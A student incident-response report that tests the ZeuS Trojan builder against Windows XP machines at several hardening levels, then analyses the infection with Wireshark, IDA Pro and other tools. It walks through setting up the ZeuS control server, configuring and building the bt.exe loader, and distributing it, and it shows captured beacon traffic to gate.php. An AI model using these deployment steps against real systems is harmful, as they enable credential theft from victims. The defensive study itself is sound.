CIS 6395 Incident Response Technologies How effective are...

CIS 6395 Incident Response Technologies

How effective are Do-It-Yourself Trojan Kits

(ie. ZeuS Builder)

By Kevin Kerkvliet

Abstract

A demonstration of how critical operating resources can be exploited was tested.

There are many agencies that have security personnel in place and procedures to follow in

order to grant the authority of computing devices to operate within a certain security

classification and process certain sensitive data. The goal was to discover the effectiveness of

the tools used to hack the common computer and the protected DoD computer. Furthermore,

observations of the common countermeasures deployed to provide protection against the

attacks were examined. Through the use of an Attacker computer and a Victim computer on

the network, the possible functions of ZeuS Builder were examined for its capability. The

effectiveness of the tool used for the attack methods against the Victim computer were proven

to be simple to used but hard to configure. There are many obstacles in obtaining the software

package and it has very little useful documentation in how to use it. Testing iterations were

done to cover different levels of protection. The levels of differences of protections of the

victim were configured within Virtual Box in order to perform this exercise.

The following are the levels for the Victim:

Standard XP OS (no service pack) and no AV

Standard XP OS (no service pack) with AV

Standard XP OS (service pack 3) with installed updates and no AV

Standard XP OS (service pack 3) with installed updates and AV

Hardened XP OS with updates and AV at low classification level

Hardened XP OS with updates and AV at high classification level

The Attacker platform was a personal web server and used strictly within the boundaries of

this educational experiment.

The use of a security DoD Gold Disk1 was used to help hardened the OS in two of the

scenarios. Retina2 will be shown within this report however it was not executed after the

realization that security hardening of the operating system is not the primary defense. The

primary defense is a good Antivirus and good user awareness training. The use of the digital

forensic tools for this experiment was IDA Pro53 and Wireshark

4. Other tools used were

secondary choices. They are reported in the sections ŖOther Quick Analysisŗ and ŖForensics

Analysisŗ. The usefulness of the tools can be determined through this process and their

applicability in the effort to find evidences that correlates the hacking activity.

1 http://www.disa.mil/services/ia.html

2 http://www.eeye.com/Retina

3 http://www.hex-rays.com/idapro/

4 http://www.wireshark.org

http://www.disa.mil/services/ia.html

http://www.eeye.com/Retina

http://www.hex-rays.com/idapro/

http://www.wireshark.org/

Table of Contents Project Goal ........................................................................................................................ 5 Gold Disk Preparation......................................................................................................... 6 Gold Disk Second System Configuration ......................................................................... 18

Retina Process ................................................................................................................... 20 Background Information about Zeus ................................................................................ 24 Zeus Configuration. .......................................................................................................... 27 Zeus Attacks...................................................................................................................... 34 Forensics Analysis ............................................................................................................ 39

Wireshark .......................................................................................................................... 41 IDA Pro 5 .......................................................................................................................... 53 bt.exe ................................................................................................................................. 53 zse.exe ............................................................................................................................... 62

Other Quick Analysis ........................................................................................................ 93 InCtrl5: .............................................................................................................................. 94

Winmerge List dlls ............................................................................................................ 99 Winmerge Procmon ........................................................................................................ 100 WinMerge TCPView ...................................................................................................... 108

Rootkit Revealer ............................................................................................................. 108 Inspection of the cp.php and gate.php ............................................................................ 108

The Answer is to use the zse.exe to see infection and fix it ........................................... 134 Conclusion ...................................................................................................................... 135 References ....................................................................................................................... 142

Project Goal

The goal of this experiment is to execute a malware program Zeus on the XP platform.

The type of actions will be examined for what can be collected by the web server. The

infected host will be searched for the impacts of the client-side malware. Digital forensics

tools will be used in finding the clues that will lead to discovering what is occurring and help

define what the Zeus characteristics are.

The various levels of security on the XP platform will be tried to see if there are any

impacts are found based on each particular security type. There will be tools used to assist of

configuring the XP to various levels. The DoD build will be part of this experiment.

There is a concept of kiddie scripts which can enhance the average computer user to be

as dangerous as the pro hacker. This experiment is going to tell how accurate this is for the

case of the Zeus system. Zeus is a software kit with some configuration and some pricing

options for the extra features. The user ability level from easy, moderate and difficult will be a

subjective rating.

The report of any discovered counter measures will be thought about and provided to

show that perhaps this Zeus system could be prevented. Special or normal information

assurance (confidentiality, integrity, and availability [CIA] ) principles or practices should be

considered.

Gold Disk Preparation

Gold Disk has three Asset Posture benchmarks that you can used to harden your

system to. You can select from Mission Critical, Mission Support or Administrative. There is

a subcategory of Classified, Public or Sensitive. For this exercise I used Administrative and

Public for one trial and then Mission Critical and Classified for another trial.

Once the selection is made you click on Evaluate Asset and it will go through all the

scripts looking for vulnerabilities at that selected level. After the scripts are ran you will get a

report with the open vulnerabilities within categories of CAT I (Red), CAT II (Orange), CAT

III (Yellow) and Green if it was already taken care of.

In the figure below is the initial screen before evaluation is performed

This shows the execution the baseline assessment is being performed.

This is the resultant of the program showing how open issues there are to solve.

From the report for a system with XP SP3 (with all recent windows updates) with

Symantec Endpoint Ver 11 there are still twelve CAT I and one hundred ninety two CAT II

findings. The CAT III/IV findings are really small is risk and by DoD policy can be mitigated

by other security policies that reduce or eliminate the vulnerability finding. In this system

there are twenty nine CAT III findings.

The next step is to go through the process of fixing the OS to the point where there are

not any CAT I and CAT II findings. There are some automatic ways to do this however it is a

manual process to step through the Gold Disk a few times because there is a possibility you

could lock it down where the system is found unusable and worthless. You want to take the

extra time and record the steps performed so if you need to back out of it. There is a remediate

button to push to continue the process.

Once you ran all the scripts for the first iteration you have to rerun the Gold Disk

utility again and see which ones are still open and which ones require manual configuration

changes that the scripts were unable to change. The remaining steps are to rerun the process

until you have successfully closed the findings and the report comes back with green and no

CAT I and CAT II findings. The unknown category is related to network policies and best

practices documentation showing the posture of the system and network architecture. There

are some unknown findings that need to be assessed by a person and certified it has been done

correctly.

You must select the directory tree to expand the section you are trying to fix. It is color coded

so you can easily find the security holes to fix.

The next thing that happens is the box of scripts pops up to fix the problems for you.

More scripts showing how they change the registry for you.

The example shows the passwords section and categories within to be fixed.

The scripts that will be ran for securing the passwords issues.

Below are more of scripts showing other system modifications of the registry.

After the first iteration of this process there are three CAT I and forty CAT II findings.

Iteration Results CAT I CAT II CAT III CAT IV Closed Unknown

Baseline 12 192 29 0 242 204

First 3 40 6 0 426 204

Problem solving with how to close findings is given when selecting on the subject

finding and reviewing the details of the item. The Description, Discussion, Details, Detection,

Remediation, Notes, Impact/Mitigation and Misc tabs give a section of information that can

be used to reach the desired affect assisting the user to secure the vulnerability.

The Local Security Settings utility from the Administrative Tools in the Control Panel

will help change the system settings. NSA also provides security templates and policy editor

to make these changes all at once but I am doing it manually since I am only doing it once for

this project. In a batch I would get my template from the first machine I configure and apply it

to the rest of like machine assets. Using the Windows Microsoft Management Console

(MMC) by typing the MMC from the run box will give the tool sets required to make

modifications to the system. You add the modules to the MMC and then change the settings as

directed by Gold Disk. If you want to run on the fly and not make a useful template for reuse

then you can execute policy editor by entering Gpedit.msc from run command and make the

manual changes as seen appropriate. REGEDIT also needs to used since the templates can’t

do it all. Some folder security permissions will be modified with REGEDIT.

Below is an example of the Details for the CAT I finding under Accounts.

Below is an example of the Remediation for how to manually fix the problem.

Gold Disk is running scripts and using generic network strategies suggested by the

experts that will be different from the unique network you configure. You will see some

False/Positive come back from the utility. Normally when a false-positive is found you have

to report it and justify why they are considered to be a treated as such. Your security

documentation will show that there is a proper check in place to deal with the flaws or when

you get the case they aren’t valid findings. In this case I have a few such as ŖUser Right / II /

User Rights Assignments- Administrators have auditing rights.ŗ I am not going to create an

Auditors group so this is alright for this finding. There will not be any impacts for the purpose

of this experiment. It would be documented as so and put into the policy for approval.

After the second iteration of running the Gold Disk, the resultant of closing the open

findings gets you to a solution that is almost complete. There are zero CAT I findings, two

CAT II findings, zero CAT III findings, zero CAT IV findings and one hundred sixty

unknown findings. The unknown findings are mixtures of all levels of CAT I/II/III/IV levels.

While looking into the unknown items you will see that eighteen are related to antivirus (AV).

Those AV ones are not relative since an approved DoD AV was installed and configured to

meet the manual checks required here. One ŖAccountsŗ finding was unknown and related to a

manual check with ensuring passwords are fifteen characters and changed at least once a year.

It has you use DUMPSEC to check this finding. The passwords were compliant with this CAT

II finding. One ŖAuditingŗ finding was unknown and required manual registry modification to

ensure failure audits was being done correctly. Documentation becomes a big portion of this

validation process.

Below is the summary of the second iteration.

There are thirty-four ŖIAVM-Aŗ unknown findings related to patches that need to be

verified manually. All are CAT I findings except nine are CAT II. There are fifty-four

ŖIAVM-Bŗ unknown findings. I noticed many are false-positives meaning that that the

findings are flagged for software that is not installed on the system. There are twenty-nine

ŖIAVM-Tŗ unknown findings. There are nineteen Manual findings that require you to look

into policy documentation or known checks that can’t be automatically detected. This requires

interviewing the system administrator to discover how the vulnerability is being managed.

There are two ŖMisc Security Updatesŗ unknown findings that are just simple management

issues. There are two ŖPatchesŗ unknown findings that are related to patch management and

network security mitigation for firewall usages. There are two ŖSecurity Optionsŗ unknown

findings that are not important to check (display banner and printer sharing). There are two

CAT III Services unknown findings which ask to make share games and MSN are removed.

There are twelve ŖUSB Devicesŗ unknown findings that discuss the security posture and use

of USB devices within the system. There are two ŖWindows Firewallŗ unknown findings that

are simple registry CAT III checks.

This table is a summary of the unknown findings and what CAT they below to.

CAT I CAT II CAT III Unknown Total

Antivirus 4 12 3 19

Desktop Application 2 16 8 26

Accounts 1 1

Auditing 1 1

IAVM-A 25 9 34

IAVM-B 30 24 54

IAVM-T 8 20 1 29

Manual 5 11 3 19

Misc Security Updates 2 2

Patches 2 2

Security Options 1 1 2

Services 2 2

USB Devices 1 2 9 12

Windows Firewall 2 2

Totals 75 101 29 205

Gold Disk Second System Configuration

The low security option is very similar to the high class one.

From the report for a system with XP SP3 (with all recent windows updates) with

Symantec Endpoint Ver 11 there are eleven CAT I and one hundred ninety three CAT II

findings. The CAT III/IV findings are really small is risk and by DoD policy can be mitigated

by other security policies that reduce or eliminate the vulnerability finding. In this system

there are twenty nine CAT III findings. This is similar to the higher classification system.

This table is the difference from high level and low level after baseline assessment is

executed.

CAT I CAT II CAT III CAT IV Unknown

I- Classified 12 192 29 0 204

III- Public 11 193 29 0 201

Below is after running the first iteration of the Gold Disk.

Below is the resultant low classification of the Gold Disk process.

Retina Process

Retina is a very intensive registry scanner and ensures that settings are flagged based

on the optional audits selected. Retina, for the experiment, would not be any value added

unless our Gold Disk failed to provide protection from the Zeus attack. In DoD practice

Retina would be used after the Gold Disk is executed. This is a double check into the integrity

of the hardening process. The use of more than one optimal tool is a good practice to employ

and often done for DoD systems. I have simple documentation of the setup and practical

issues of Retina however I did not provide summary results for this exercise.

Retina is pretty simple to use. You need some configurations to be properly

implemented in order for the scanning engine to access the files but after that it is a couple of

buttons and a report that shows you what it finds as a finding and some help how to close the

it. Just like Gold Disk and other applications there are flaws and false-positives to consider

when doing the analysis of the reports.

The key is to configure the server and client machines properly.

1. Credentials

a. Use Domain Administrator credentials, or local admin credentials for the target

machine.

b. Verify that the password you are using is correct.

c. Remember to include the domain if necessary. Enter credentials into Retina as

DOMAINNAME\USERNAME

2. Services

a. Make sure that the ŖServerŗ service and ŖRemote Registryŗ service are running

on both the scanner and target machines.

3. Ports

a. Make sure that you can ping the target machine from the scanner.

b. From a command prompt execute netstat –an and make sure that the following

ports are listening:

i. TCP 135, UDP 137, TCP 139 and TCP 445

4. Local Security Policy

a. Verify that the NTLM settings are the same for both the scanner and the target.

To do this:

i. Go to Start -> Control Panel -> Administrative Tools -> Local Security

Policy

ii. Under Local Policies go to Security Options

iii. Open policy ŖNetwork security: LAN Manager authentication

iv. Verify that the NTLM setting is the same for both scanner and target.

If not the same, change the setting so that they are equal.

5. Simple File Sharing

a. If scanning Windows XP target, you must turn on Simple File Sharing. To do

this:

i. Open Windows Explorer. Go to Tools -> Folder Options.

ii. Select the View tab and scroll down to ŖSimple File Sharingŗ and make

sure it is selected.

In the program the first step is to select your target IP

The next step is to select the audit type you want to execute. This part is the ports.

This part is the type of OS Audits.

This shows how to put in the credentials correctly for the target client.

This shows the job in the queue and running.

The next procedures would be to review the output files and rerun the utility until the

desired reporting shows the system is clear of any findings. After a Gold Disk execution

Retina still can find open finding however it isn’t usually that many. It is a good tool to use in

practice and easier for regular maintenance for keeping the network devices compliant over

periodic time.

Background Information about Zeus

There are some interesting publications out there about Zeus or a variant of it however

the practical information is not shared or may not be accurate. I could not find anything

representing just the facts but the opinions of authors who may or may not be technical IT

gurus. Then the publishing companies’ lawyers probably stripped a lot of the key information

to protect themselves from potential lawsuits. When looking at the php source code of the

program I found a lot of Russian words that is throughout the whole code of the program. The

best source of the information may be either classified or underground hiding in the black

markets or other foreign markets where they don’t have laws against software piracy or

hacking. So I found some generic opinions from the Internet which may hold some weight but

are not fundamentally sound.

Dell owns a website called http://www.secureworks.com and published an article

on Zeus on March 11, 20105. They called the program a banking Trojan that Ŗsteals data from

infected computers via web browsers and protected storage.ŗ The website is very thorough in

explaining what the program does and how it works. The latest one Dell knew of was Zeus

1.3.4.x. I found a couple variants on forums but the only working version was Zeus 1.2.7.19

which was the same as the version from Dell’s report. Dell does a good explanation of the

variant numbering system. The major concern is that the countermeasure used to detect this

malware is the AV and it may be easily overcomed. According to Dell the next versions 1.4

has Polymorphic Encryption.

5 http://www.secureworks.com/research/threats/zeus/?threat=zeus

http://www.secureworks.com/

http://www.secureworks.com/research/threats/zeus/?threat=zeus

“The 1.4 version of ZeuS will enable the ZeuS Trojan to re-encrypt itself each time it

infects a victim, thus making each infection unique. The 1.4 version also enables the

ZeuS file names to be randomly generated, thus each infection will contain different

file names. This will make it very difficult for anti-virus engines to identify the ZeuS

Banking Trojan on the victims’ system.ŗ ŔDell

With this kind of technology in place it makes it very difficult to put effective

countermeasures in place to protect users from the malware.

The table below summarizes Dell’s information of the variant.

a.b.c.d

a(1) - a complete change in the bot. This has never changed from 1.

b(3) - Major changes that cause complete or partial incompatibility with the previous versions. Recently we

moved from version 2 to version 3.

c(2) - This is for bug fixes, improvements, and adding features.

d(1) - This for a small revision in the code to make the malware undetectable by AV vendors.

The main functions that Dell says the Zeus program performs is listed below.

Steals data submitted in HTTP forms

Steals account credentials stored in the Windows Protected Storage

Steals client-side X.509 public key infrastructure (PKI) certificates

Steals FTP and POP account credentials

Steals/deletes HTTP and Flash cookies

Modifies the HTML pages of target websites for information stealing purposes

Redirects victims from target web pages to attacker controlled ones

Takes screenshots and scrapes HTML from target sites

Searches for and uploads files from the infected computer

Modifies the local hosts file (%systemroot%\system32\drivers\etc\hosts)

Downloads and executes arbitrary programs

Deletes crucial registry keys, rendering the computer unable to boot into Windows

The concept of how it works is pretty simple. A web server with a MySQL database

for saving captured information is out on the Internet somewhere. Then there is an executable

file that is sent to an unsuspicious victim by some kind of scheme like opening up an

unknown mail attachment which installs a Trojan program. Once the program is running on

the victim’s machine it will start sending the types of information that the web server will be

listening for and recording into its database. In my experiment I didn’t see success in my

database like Dell did.

Zeus Configuration.

The steps to start the configuration were to find a good source for the files that will not

be disclosed in this report. There are two parts to the Zeus system. There is a client program

that will be used to help configure a Ŗcfg.binŗ and a Ŗbt.exeŗ file. The GUI of this program is

basic and has simple functions to detect if the virus is present, to clean the virus, and to

generate the virus. The second part of the Zeus system is the web server portion which

primary focuses are the data collection and command and control of acquired systems.

The web server files were packed in a file called upload.zip and contains the required

files to setup the web host. The file was uploaded to a host web server with MySQL services.

The upload.zip file was unpacked and ready to execute online after proper database file and

database user account was established for Zeus.

You also have to change the permissions on the file folder structure to 777 to give complete

access for the program to install and run correctly.

Afterwards you go the browser and enter the correct path to the install file and it opens up a

php form. The correct path is the Ŗinstall/index.phpŗ and the automatic form to complete is

shown below.

In this case I used ucf as the database name and user account name. You also need to use the

provided encrypted key to protect the program and data. After the install button is clicked it

will automatically configure the web server system to the proper Zeus web services that

generate all the database files and tables for storage which is used for the collection that the

Trojan client program is sending to it. It will take a few seconds to complete. The web

browser will give you a status of the items it just completed doing. After inspection of the web

server database contents and file folders contents you will observe what the

Ŗinstall/index.phpŗ script has just completed for you automatically. Below are the status

screen shot and a listing of the database tables just created from this step.

Finally you are all setup for the capturing and storing the data for the Zeus system. You can

log into the web server on the web host to view the command and control GUI that will also

give you status of your captured systems reporting to this web server over the Internet.

The client side of the Zeus system is the utility that will configure the malware and

detect and clean the Zeus virus from the client machine. Once you open the program utility

you will get the default Information screen stating it detects no virus or it does and a button to

clean it if needed. Upon the need to clean it you will have to restart the computer. The builder

tab gives the option to make the malware. You click on ŖEdit Configŗ button and get to

modify to the default config.txt file to meet your needs. I selected ŖReplace_Allŗ and replaced

with the correct path the web host as seen below.

After inspecting the config.txt like in the picture above, you will find that the link underneath

the highlighted area request for a file called Ŗip.php.ŗ I could not find that file in the web

server file directory or the given package files from the source I received the files from. It may

be the reason why my web server hasn’t received any of the traffic from the infected host in

my trials and why my database remains empty. Moving forward though with a ninety percent

solution we will save the text file and close it. Next step is to click on ŖBuild Configŗ button

and you will see the utility run procedures and create a Ŗcfg.binŗ file that will be used on the

web server to for a complete web configuration. Below is the sample screenshots

demonstrating this.

Once that is complete you will upload this Ŗcfg.binŗ file to the web server underneath the

same directory the other Zeus files are residing. In theory it should work but there is that one

missing file that I could not decipher or find as part of this configuration.

The remaining step to complete is to click on the ŖBuild loaderŗ button to make the malware

executable. This is seen in the screenshot below.

The Ŗbt.exeŗ files is created and then you have to craft a unique scheme to pass it around to

potential victims to execute. It was uploaded to the web server for simple download access for

the host computers for this experiment.

Zeus Attacks

The attacks were very simple to execute by accessing the link from the web server in

this experiment. There was no elaborate scheme to mask the malware file. It was simply

downloaded and ran where possible. The following screen shots are shown as impacted or not

impacted to give a quick overview to this experiment. The results of the behavior of each

preconfigured system are obvious for us to see if the Ŗbt.exeŗ malware affected the system or

not.

Standard XP with no service packs or AV- Not Impacted

Standard XP with no service packs and has AV- Not Impacted

Standard XP OS with SP3 and Windows Updates and AV Ŕ Not Impacted

Standard XP OS with SP3 and Windows Updates and no AV - Impacted

After a manual reboot this impact caused blue screen of death that continues in a loop

Harden XP OS Low Class with SP3 and Windows Update with AV Ŕ Not Impacted

Harden XP OS High Class with SP3 and Windows Update with AV Ŕ Not Impacted

The following table is the summary of the screen shots.

OS Configuration Impacted / Not Impacted

Standard XP with no service packs or AV Not Impacted

Standard XP with no service packs and has AV Not Impacted

Standard XP OS with SP3 and Windows Updates and AV Not Impacted

Standard XP OS with SP3 and Windows Updates and no AV Impacted

Harden XP OS Low Class with SP3 and Windows Update with AV Not Impacted

Harden XP OS High Class with SP3 and Windows Update with AV Not Impacted

We can see that the malware Ŗbt.exeŗ file only impacted one of the OS configurations. From

this we can see that this updated signature AV plays an important process in the discovering

and preventing of this version of the malware and that between the updates from no service

pack to the latest updates that an open vulnerability is made available for this malware version

to take advantage of.

Forensics Analysis

For the discovery of what was going on behind the scenes, the tools Wireshark, IDA

Pro 5.0, PEiD, Ultimate Packer for Executables (UPX) and the ones listed in the section

ŖOther Quick Analysisŗ were used to gather the details of the malware. In addition the php

source code was examined for clues.

From the simple use of the PEiD packer checking utility tool we see if the Ŗbt.exeŗ file

or the client utility executable Ŗzse.exeŗ is being packed. We see that the Ŗbt.exeŗ file is not

being packed since is returned the ŖNothing found *.ŗ Therefore we do not have to worry

about the IDA Pro 5 tool not getting to all of the assembly language code. It won’t get lost in a

unrecognized compression algorithm.

When looking at the client utility executable we see it is packed. The next step was to unpack

it. It shows ŖUPX 0.89.6 Ŕ 1.02 / 1.05 Ŕ 2.90 -> Markus & Laszloŗ as the packer type and

version. So the correct procedure to unpack the file is to get the same packer type compatible

with the information discovered.

With the UPX tool utility I unpacked the Ŗzse.exeŗ client builder utility and prepared it to be

examined by IDA Pro.

Wireshark

The Wireshark analysis started with capturing the interface from a MAC OS and

processing the capture for a period of time of nine hours and forty five minutes after the

execution of the Ŗbt.exeŗ infection took place on the OS configuration ŖStandard XP OS with

SP3 and Windows Updates and no AV.ŗ The capture file was filtered to display only the

traffic from the infected host to the web server. The filter used in Wireshark was Ŗip.dst ==

xxx.xxx.xxx.xxx && ip.addr eq 192.168.1.109ŗ where xxx.xxx.xxx.xxx is shown in this

report to be the masked the web server. It is a valid public domain web hosting IP address.

The summary statistics is shown below.

Below is a sample of line summary of Wireshark from the host to the web server to give you a

pattern of what is happening with the infected host and the web server.

No. Time Source Destination Protocol NT SMBs Info

10 0.671484 192.168.1.109 xx.xxx.xxx.xx TCP clvm-cfg > http [FIN, ACK] Seq=1 Ack=1 Win=64858 Len=0

12 0.818177 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460

SACK_PERM=1

27 1.117772 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=1 Ack=1 Win=65535 Len=0

28 1.118682 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0

41 1.495183 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=198 Ack=679 Win=64858 Len=0

42 1.499518 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [FIN, ACK] Seq=198 Ack=679 Win=64858 Len=0

43 1.500482 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460

SACK_PERM=1

49 1.803196 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=1 Ack=1 Win=65535 Len=0

50 1.803987 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0



65 2.204872 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [FIN, ACK] Seq=206 Ack=1775 Win=65535 Len=0

66 2.206144 192.168.1.109 xx.xxx.xxx.xx HTTP POST /ucf/gate.php HTTP/1.1

72 2.577154 192.168.1.109 xx.xxx.xxx.xx TCP netmap_lm > http [ACK] Seq=514 Ack=222 Win=65093

Len=0

298 7.471422 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460

SACK_PERM=1

307 7.583562 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0

308 7.584476 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0

332 7.889639 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=198 Ack=679 Win=64858 Len=0

333 7.892491 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [FIN, ACK] Seq=198 Ack=679 Win=64858

Len=0

334 7.893379 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460

SACK_PERM=1

358 8.168568 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0

359 8.169845 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0



377 8.624013 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [FIN, ACK] Seq=206 Ack=1775 Win=65535

Len=0

Next I filtered by the option Statistics -> Conversations to narrow the information from host to

web server. From that you can see the basic information summary of ports and how many

packets went from host to web server. We can also see that the host used 3709 different types

of ports while sending information back to the web server.

From Statistics -> Flow Graph we see the Ŗgate.phpŗ and the Ŗcp.phpŗ are the primary files

that the host was getting from the web server.

There is not any other evident information from Wireshark showing the type of files

that the infected host is sending to the web server. There are many xml files that appear in

packets when looking at the file transfers from the server to the infected host. It appears that

every possible known port is attempted in order. From the Flow Graph sample output we see

ports itm-lm (ITM License Manager), silkp1, silkp2, silkp3, silkp4 and glishd. Most of the

payloads seem to have been encrypted before transferring the data. This will be seen in the

following sample TCP data stream outputs.

dellpwrappks:

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆðqua;Poï’ì:.R«"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqH²ſµ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´ç7n%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µ3C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:27:03 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=30


Content-Type: text/html


Accept: */*


Host: xxx.com

Content-Length: 343


Pragma: no-cache

€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•


¸eqcê<·1ÑàqHjÿ‹*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™•�%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¾f

A¨ïÛéf�«åÝrŖc…¬¡XøDûìkL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ

kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ²©ŗ»žlDø>

¢¹

Ü.| dŒÛ ̀ ÍáŕÑb¼

’%µR‰ÜÚÖ^VTSZ=ÍÀ/ob

ŗÜ¸ë;ƒO„kÜ¥HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:27:08 GMT

Server: Apache



Content-Length: 0

Connection: close


dx-instrument:


Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆð_S±¡®

ýÅ<?¦ºüñ;ñ"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÓàqH§µ*Ï¨ýð"ðÇN_ý@k1

ñB:U-@NÈØ2oACøÿ«ë¬ÒŽð´…e%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ

½¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:32:52 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆð:»qyk¶ÿ… žÍh•,]"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•


¸eqcê<·1ÑàqH§µ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´®e%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µãC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:32:58 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆð²þ|ÎÈÑ·÷ŸüxõäL="³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÓàqH

§µ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´'µe%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ïÛéf�«åÝrŖc

…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µðE7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:33:04 GMT

Server: Apache



Content-Length: 0




post ucf gate pkt-krb-ipsec:


Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆð«lRò1©®ãGt•ÿy|÷"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÑàqHÉ§µ*Ï¨ýð"ðÇN_ý@k1 ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´-

]k%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1

vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µ-B7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200

OK

Date: Mon, 25 Apr 2011 11:29:54 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 343


Pragma: no-cache


ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÑàqHjÿ‹*Ï¨ýð"ðÇN_ý@k1

ñB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1

vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûìkL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ

kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ

²©ŗ»žlDø>ÿ¹




Date: Mon, 25 Apr 2011 11:29:57 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆðZg‡Àî^l

ìê7•Ð•"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl ¿̧î.: ÔŔ

¸eqcê<·1ÑàqHÃ§µ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´)ck%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA

